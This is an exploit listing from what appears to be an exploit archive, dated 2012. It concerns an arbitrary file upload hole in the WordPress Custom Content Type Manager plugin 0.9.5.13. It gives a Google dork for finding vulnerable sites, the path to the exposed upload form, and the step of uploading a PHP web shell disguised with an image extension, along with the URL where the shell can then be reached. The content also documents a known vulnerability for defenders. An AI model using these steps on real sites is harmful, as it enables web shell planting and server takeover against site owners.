[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload Vulnerability
# Published : 2012-06-11
# Author :
# Previous Title : Wordpress SfBrowser Version 1.4.5 Arbitrary File Upload Vulnerability
# Next Title : Zend Framework Local File Disclosure


###########################################################
#
# Exploit Title: Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/custom-content-type-manager/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://www.fireproofsocks.com/
# Software Link: http://downloads.wordpress.org/plugin/custom-content-type-manager.0.9.5.13.zip
# Version: 0.9.5.13
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php

exploit :

http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php

	-> upload your shell with image ext (jpg|png|gif)
	
shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg

#####################################################################